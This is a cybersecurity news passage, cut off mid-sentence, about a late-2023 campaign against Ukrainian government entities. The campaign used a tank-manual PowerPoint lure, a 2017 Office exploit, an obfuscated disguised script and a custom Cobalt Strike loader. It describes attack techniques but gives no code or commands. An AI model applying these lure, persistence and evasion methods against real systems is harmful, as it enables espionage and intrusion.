Military Tank Manual, 2017 Zero-Day Anchor Latest Ukraine Cyberattack
An unknown threat actor targeted government entities in Ukraine toward the end of 2023 using an old Microsoft Office remote code execution (RCE) exploit from 2017 (CVE-2017-8570) as the initial vector and military vehicles as the lure.
The threat actor initiated the attack using a malicious PowerPoint file (.PPSX) sent as an attachment through a message on secure messaging platform Signal. This file, which masqueraded as an old instruction manual by the US Army for mine-clearing blades for tanks, had in fact a remote relationship to an external script hosted on a Russian virtual private server (VPS) provider domain protected by Cloudflare.
The script executed the CVE-2017-8570 exploit to achieve RCE, according to a Deep Instinct blog post on the attack this week, in an effort to steal information.
Underneath the Hood of a Tricky Cyberattack
In terms of the technical nitty-gritty, the obfuscated script masqueraded as Cisco AnyConnect APN configuration and was responsible for setting persistency, decoding, and saving the embedded payload to disk, which happened in several stages to evade detection.
The payload includes a loader/packer dynamic link library (DLL) named “vpn.sessings” that loads a Cobalt Strike Beacon into memory and awaits instructions from the command-and-control (C2) server of the attacker.
Mark Vaitzman, threat lab team leader at Deep Instinct, notes that the penetration testing tool Cobalt Strike is very commonly used among threat actors, but this particular beacon makes use of a custom loader that relies on several techniques that slow down analysis.
“It is continuously updated to provide attackers with a simple way to move laterally once the initial footprint is set,” he says. “[And] it was implemented in several anti-analysis and unique evasion techniques.”
Vaitzman notes that in 2022, a severe CVE allowing RCE was found in Cobalt Strike — and many researchers predicted that threat actors would alter the tool to create open source alternatives.
“Several cracked versions can be found on underground hacking forums,” he says.
Beyond the tweaked version of Cobalt Strike, he says, the campaign is also notable for the lengths to which the threat actors…
